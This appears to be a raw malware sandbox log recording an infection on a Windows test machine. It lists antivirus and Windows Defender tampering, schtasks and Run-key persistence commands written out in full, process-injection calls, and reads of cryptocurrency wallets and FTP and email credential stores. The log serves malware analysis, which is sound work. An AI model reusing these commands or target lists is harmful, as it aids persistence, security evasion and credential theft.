protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000228
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x005cbf20
service_name: WinDefend
control_code: 1
0 0

ControlService

service_handle: 0x005cc2e0
service_name: wuauserv
control_code: 1
0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 reg_value C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\stan.exe reg_value C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\AppData\Roaming\Electrum\wallets
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM Win32_Process
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: 
base_address: 0x000000013f2b22b0
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0d88
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I»`#(?Aÿã
base_address: 0x0000000076d81590
process_identifier: 2980
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: l
base_address: 0x000000013f2c0d78
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I» (?Aÿã
base_address: 0x0000000076d57a90
process_identifier: 2980
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: l
base_address: 0x000000013f2c0d70
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: ϝT
base_address: 0x000000013f260108
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
base_address: 0x000000013f2baae8
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0c78
process_identifier: 2980
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2b22b0
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0d88
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I»`#(?Aÿã
base_address: 0x0000000076d81590
process_identifier: 2580
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: /
base_address: 0x000000013f2c0d78
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I» (?Aÿã
base_address: 0x0000000076d57a90
process_identifier: 2580
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: /
base_address: 0x000000013f2c0d70
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: ϝT
base_address: 0x000000013f260108
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
base_address: 0x000000013f2baae8
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0c78
process_identifier: 2580
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2b22b0
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0d88
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I»`#(?Aÿã
base_address: 0x0000000076d81590
process_identifier: 2964
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: ?
base_address: 0x000000013f2c0d78
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: I» (?Aÿã
base_address: 0x0000000076d57a90
process_identifier: 2964
process_handle: 0x0000000000000050
1 1 0

WriteProcessMemory

buffer: ?
base_address: 0x000000013f2c0d70
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: ϝT
base_address: 0x000000013f260108
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
base_address: 0x000000013f2baae8
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000013f2c0c78
process_identifier: 2964
process_handle: 0x000000000000004c
1 1 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELS4¬eà Ø n@ @ƒkP0(ëlD.text¾ `.rdata\=0>@@.data0¾p®X@À.reloc(ë0ì@B
base_address: 0x00400000
process_identifier: 4192
process_handle: 0x0000029c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 4192
process_handle: 0x0000029c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¸éïà 0äÌŽ @  @…@K ÀÉ  H.text”â ä `.rsrcÀÉ Êæ@@.reloc °@B
base_address: 0x00400000
process_identifier: 5088
process_handle: 0x00000228
1 1 0

WriteProcessMemory

buffer:  2
base_address: 0x00450000
process_identifier: 5088
process_handle: 0x00000228
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 5088
process_handle: 0x00000228
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELS4¬eà Ø n@ @ƒkP0(ëlD.text¾ `.rdata\=0>@@.data0¾p®X@À.reloc(ë0ì@B
base_address: 0x00400000
process_identifier: 4192
process_handle: 0x0000029c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¸éïà 0äÌŽ @  @…@K ÀÉ  H.text”â ä `.rsrcÀÉ Êæ@@.reloc °@B
base_address: 0x00400000
process_identifier: 5088
process_handle: 0x00000228
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000484
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000484
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000484
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000484
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x0000047c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000470
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000588
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000588
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000594
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000598
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000005d8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
file C:\Users\test22\AppData\Roaming\ICQ\0001
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
process stan.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process explorhe.exe useragent
process InstallSetup7.exe useragent NSIS_Inetc (Mozilla)
process rty25.exe useragent HTTPREAD
Process injection Process 3228 called NtSetContextThread to modify thread in remote process 4192
Process injection Process 4844 called NtSetContextThread to modify thread in remote process 5088
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2226600
registers.edi: 0
registers.eax: 4288032
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000298
process_identifier: 4192
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3734452
registers.edi: 0
registers.eax: 4391566
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000224
process_identifier: 5088
1 0 0
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\f6938b53-4e70-4b9a-9dfb-6214ea4714d7.dmp"
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1176,12868731222924543524,12663972143895156928,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=FFBC34D29C4FFB0D59428C7CA88DBE18 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2444 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
parent_process firefox.exe martian_process "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\ae114d14-d6af-4b01-bdc9-950de0d5db9c.dmp"
